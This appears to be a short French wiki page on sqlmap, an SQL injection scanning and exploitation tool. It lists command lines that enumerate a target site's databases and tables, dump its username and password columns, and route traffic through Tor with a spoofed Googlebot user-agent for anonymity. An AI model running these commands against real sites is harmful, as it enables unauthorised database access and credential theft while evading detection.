Sqlmap
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Type | Scanner / exploitation d'injection SQL |
| Cible | MySQL et autres SGBD |
| Anonymat | support Tor |
| Voir aussi | Injection sql · Havij |
sqlmap est un outil d'automatisation de la détection et de l'exploitation des injections SQL. Il permet notamment de faire des recherches sur des dorks (listes de syntaxes d'URL).
Usage
# URL = http://site-cible.example/index.php?id=5
./sqlmap.py -u "$URL" --dbs
# choper une base
./sqlmap.py -u "$URL" -D yboa --tables
# choper une table
./sqlmap.py -u "$URL" -D yboa -T allowed --columns
# choper une colonne (utilisateur)
./sqlmap.py -u "$URL" -D yboa -T allowed -C uname --dump
# choper une colonne (mot de passe)
./sqlmap.py -u "$URL" -D yboa -T allowed -C passwd --dump
Via Tor
./sqlmap.py -u "$URL" --tor \
--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Interface graphique
apt-get install python-tk sakura
# récupérer ensuite le paquet sqlmap GUI (sqm***.zip)
Voir aussi
- Injection sql — principes et méthode manuelle
- Havij · Pangolin · BSQL · Themole — autres outils